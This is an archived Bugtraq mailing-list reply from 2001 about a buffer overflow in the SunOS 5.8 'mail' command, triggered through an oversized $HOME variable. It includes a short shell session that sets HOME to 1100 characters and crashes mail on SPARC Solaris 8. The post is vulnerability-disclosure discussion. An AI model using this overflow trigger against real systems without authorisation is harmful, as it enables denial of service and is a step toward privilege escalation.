[20883] in bugtraq
Re: $HOME buffer overflow in SunOS 5.8 x86
daemon@ATHENA.MIT.EDU (Tohru Watanabe)
Wed Jun 6 01:12:36 2001
Date: Tue, 5 Jun 2001 20:01:23 -0500 (CDT)
From: Tohru Watanabe <tohruw@heaven.hamline.edu>
To: Gunnar Wolf <gwolf@campus.iztacala.unam.mx>
Cc: "Juergen P. Meier" <jpm@class.de>, Georgi Guninski <guninski@guninski.com>,
Bugtraq <BUGTRAQ@securityfocus.com>
In-Reply-To: <Pine.BSO.4.31.0106051346100.1152-100000@campus.iztacala.unam.mx>
Message-ID: <Pine.LNX.4.21.0106051958520.25771-100000@heaven.hamline.edu>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
> > 0:jpmeier@sol:~> HOME=`perl -e 'print "A"x1100'` ; export HOME
> > 0:jpmeier@sol:/home/jpmeier> mail a
> > ^Cmail: Mail saved in dead.letter
> > 1:jpmeier@sol:/home/jpmeier> uname -a
> > SunOS sol 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-5_10
> >
> >
> > also tried larger buffers.
> >
> >
> > Solaris/sparc appears not vulnerable. Maybe its an x86 bug only
It crashed our Solaris 8.
bash-2.03$ uname -a
SunOS sunserver 5.8 Generic_108528-07 sun4u sparc SUNW,Ultra-60
bash-2.03$ HOME=`perl -e 'print "A"x1100'`
bash-2.03$ export HOME
bash-2.03$ mail a
^Cmail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
mail: ERROR signal 10
